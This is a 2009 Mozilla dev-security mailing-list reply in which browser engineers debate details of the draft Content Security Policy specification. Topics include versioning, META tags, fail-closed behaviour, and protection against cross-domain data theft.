I'm not sure about Usenet etiquette (it's been years) so I'll try
replying inline for now.  :-)

On Jul 6, 3:02 am, Gervase Markham <g...@mozilla.org> wrote:
> Hi Eric,
>
> Some really, really great points here. My thoughts on some of them:
>
> On 06/07/09 01:28, EricLaw wrote:> Server CSP Versioning
> > Can the server define which version of CSP policies it wants to use,
> > allowing the client to ignore?  I know that backward compatibility is
> > the goal, but other successful features (E.g. Cookies) have had tons
> > of problems here as they try to evolve.  The current “Handling parse
> > errors” section imposes a number of requirements that might be onerous
> > in the distant future when we’re on version 5 of the CSP feature.
>
>  >
>  > User-Agent header
>  > What’s the use-case for adding a new token to the user-agent header?
>  > It’s already getting pretty bloated (at least in IE) and it’s hard to
>  > imagine what a server would do differently when getting this token.
>
> I also haven't quite got this straight in my head.
>
> I think it would be useful for the spec to contain a lot more detail on
> what it hopes to achieve with the current versioning system - scenarios
> where it would be useful, scenarios where it won't help, and so on - and
> also why we decided not to put a version number in the CSP response itself.
>
> > Style-src
> > I don’t know what “style attributes of HTML elements” means.
>
> It means <div style="some CSS here"></div>

That's what I figured, but I'm not sure I understand how CSP applies.
Is it applying to url() statements (if any) that are inlined in the
style attribute?  Or is there some other way that the style attribute
allows retrieval of remote content?

> > frame-ancestors
> > In addition to IFRAMEs/FRAME tags, this should also restrict OBJECT
> > tags that point to HTML pages, correct?
>
> I guess so :-)
>
> > W3C folks have been giving us (IE) a hard time about the number (and
> > scattered documentation) of X- header names
> >http://blogs.msdn.com/ieinternals/archive/2009/06/30/Internet-Explore...,
> > and they’ve strongly encouraged us to register our header names (even
> > provisionally) with 
> > IANAhttp://www.iana.org/assignments/message-headers/message-header-index....
> > rather than using the X- prefix.
>
> I'm sure we can do that, particularly if we have buy-in or tacit support
> from multiple browser vendors. We are early in a Firefox development
> cycle, so we do have time.
>
> > HTTP Header: Final
> > It seems like it might be useful for a CSP Header to declare that it’s
> > the “Final” security policy, to prevent meddling by META Header
> > injection and the like.
>
> The very existence of "meta" is now under discussion. But I think that
> if we do implement a merging algorithm (which I think we should, albeit
> for multiple headers) a "final" directive might be useful.


Dropping META support has its merits, but that suggests one couldn't
use CSP with any protocol which doesn't allow for headers (FTP/FILE,
etc).


> > Are relative URIs valid for the report-URI/policy-URI?  (Seems like
> > this would be a good thing to support). However, if so, is there any
> > interaction/relationship with the BASE tag, which is supposed to also
> > appear early in the head?
>
> Very good question.
>
> > What happens to CSP if I save a CSP-protected document to my local
> > disk?  I’d assume it would be ignored (because many restrictions could
> > be broken) but this should be explicit.  Also, when saving docs to
> > disk, HTTP headers are lost, so to preserve it, you’d need to
> > explicitly serialize to a META tag, which could get complicated if the
> > document already had a CSP META…
>
> Another good one. Gut reaction: The things CSP is supposed to help with
> are mostly connected with the page being loaded from a particular target
> site. If it's no longer being loaded from that site, many of them go
> away. So I think the answer is that CSP protection is removed. We
> currently restrict HTML loaded from the local disk from accessing other
> files on the local disk, but not in other ways.
>
> > Therefore, a site could specify “*.example.com” to match
> > “www.example.com”and “example.com”.
>
> Hmm. For people not thinking, this would obey the Rule of Least
> Surprise, but for people thinking, it would not obey that rule. <sigh>
>
> > Doesn’t make sense to me, because “self” is defined to include the
> > scheme.  This suggests that we need a "selfhost" directive, which
> > includes the hostname only.
>
> Or we make the same word serve two purposes, doing the "obvious" thing.
>
> > Parse Errors: Server detection
> > Parse errors are defined as only being reported on the client.  This
> > is probably reasonable, but leads to the possibility that some UA will
> > fail to parse some CSP directive and the server operator will not know
> > about it.
>
> Will this be a problem in practice, given that presumably the server
> owner tests their site with a variety of UAs? We don't ping server
> owners to say "your HTML is unparseable", after all. That would rather
> increase the amount of traffic on the Internet! ;-)


True enough.  :-)


> > If the “Fail closed” model is used, is there any way for the user to
> > know why the site is broken?  Isn’t this going to create a problem,
> > where, say, a FF4 user will “downgrade” to a browser that doesn’t
> > support CSP (say, Opera 9) because the site “works properly there”?
> > Everyone loses.
>
> This is a problem with a "tighten when the header is used, and then use
> directives to loosen" approach. Content Restrictions had the opposite
> approach - it started with loose (i.e. the situation as it is without CR
> support) and tightened using directives. This avoided this problem. Of
> course, both directions have pros and cons.


Oh, I think Fail Closed is a fine model, but unless there's some way
for the user to know why the page is completely busted, it seems
likely that they're going to blame the properly-behaving UA rather
than the site.  Pretty much the same problem one encounters with
strict XHTML validation failure-- how do you ensure that the user
blames the site, not the UA?


> > Agreeing with Sacolcor, I think the spec should explicitly note that
> > CSP isn’t intended to apply to User-Scripts, although I think the
> > Greasemonkey guys might find it hard to implement their current
> > feature-set considering where CSP is likely to be implemented in the
> > browser stacks.
>
> We need to avoid breaking Greasemonkey/GreasemonkIE.
>
> > Scope Creep: exempt HEAD
> > We’ve had some folks suggest that CSP-like schemes would be more
> > easily deployed if they could allow arbitrary script/css to be
> > embedded inline/referenced in the HEAD tag.
>
> Yes; CR originally had a way to allow this. I think it would make
> converting sites quite a bit easier.
>
> > In particular, this could be used by non-JS responses to explicitly
> > prevent them from being used by SCRIPT tags, and to prevent HTML files
> > from being scraped by liberal CSS parsers.  This is an anti-CSRF ASR.
>
> I think using CSP should also mean that the scripts which are permitted
> have to be served with the correct content type. As others have said,
> this prevents people using E4X and some user content elsewhere in the
> same domain to inject script which is actually an HTML page.


Oh, sure, but the scenario I'm trying to cover is the case where a
cross-domain attacker's site (not using CSP) is trying to steal (via
E4X, Script Inclusion, CSS style enumeration, etc) content from the
victim site (which uses CSP on all of its pages).  Unless there's some
way for a resource (e.g. a script, CSS, HTML page) to enforce that its
content can only be accessed by appropriate tags (e.g. refuse to load
a text/html document in response to a <LINK rel=stylesheet> query)
then data theft (leading to CSRF) is possible.

After we shipped it, a major web property requested that the "X-
Content-Type-Options: nosniff" directive work like this to protect
against some threat vectors they suffer.

> > Scope Creep: Same Origin Only
> > The claim “Content Security Policy enables a site to specify which
> > sites may embed a resource” is currently over-broad, but it shouldn’t
> > be.  (CSP currently seems to only apply to HTML documents, not
> > "resources" in general).
>
> Yes, we need to think more about how CSP applies to non-HTML and
> non-HTTP resources.
>
> > It seems natural that a subdownload should be able to say e.g. Content-
> > Security-Policy: callers<originlist>  which would cause the UA network
> > stack to refuse to process (e.g. Set-Cookie) or return the content (to
> > a script tag, object tag, image tag, XHR request etc) unless the
> > Origin of the requestor matches the specified Origin list.
>
> People have wanted the web to do this for years to prevent people
> leaching e.g. image bandwidth, but I'm not convinced it would be a great
> thing for the web. It seems to me that this sort of behaviour is a
> regrettable side effect of an open web, but one we should just live with.


I think I understand the concerns (similar to those voiced by folks
who think frame-busters like X-Frame-Options or CSP's "frame-
ancestors" directive are a bad idea, because they break sites that
want to frame content they don't own).  But I think there's a very
legitimate case to be made for the potential security value in
preventing unexpected cross-domain data reads.

> > I’m not fully convinced that the “Origin” proposal (or at least the
> > versions I’ve read closely) will prove generally workable.  Among
> > other problems, every protected resource would need to be served with
> > a Vary: Origin header, which is problematic for a number of reasons,
> > including legacy IE bugs (http://blogs.msdn.com/ieinternals/archive/
> > 2009/06/17/9769915.aspx).
>
> Presumably you've sent that feedback in the relevant direction?


I haven't been keeping up on the progress of the Origin proposal, but
I did ask some probing questions in this vein a long time ago.  I was
hoping that we'd be able to come up with a different approach which
offers improved security / deployability properties, and I think CSP
might do just that with a few tweaks.


> > ---------------
> > Feedback from others
> > ---------------
> > ASP.NET Controls
> > Apparently, ASP.NET controls are tightly bound to use of JavaScript:
> > protocol URIs, and this isn’t likely to be easily changed.  For that
> > reason, it might be interesting to have a way to allow only those URIs
> > and not inline script blocks, event handlers, etc?
>
> I know nothing about ASP.NET controls. Are these pre-built blocks of
> HTML that can be included in a page when it's built with ASP?


Yeah, that's the basic idea I think (I know very little about ASP.NET
myself).  I think the idea is that the dev/designer uses the IDE to
drop a "HTML component" onto the page (e.g. a date-picker), and the
toolkit emits the HTML/script which implements the functionality of
the control.

> I guess the question is: have we effectively blown up all the protection
> if we allow javascript: URIs? Can every possible exploitation method be
> adapted to use them?

Well, I think the obvious threat is that a bad guy who finds an XSS
hole can inject an <A> tag with an onclick method pointing to a
JavaScript URI, but this seems to represent a subset of all possible
attacks, and may be significantly less compelling to the attacker.
_______________________________________________
dev-security mailing list
dev-security@lists.mozilla.org
https://lists.mozilla.org/listinfo/dev-security

Reply via email to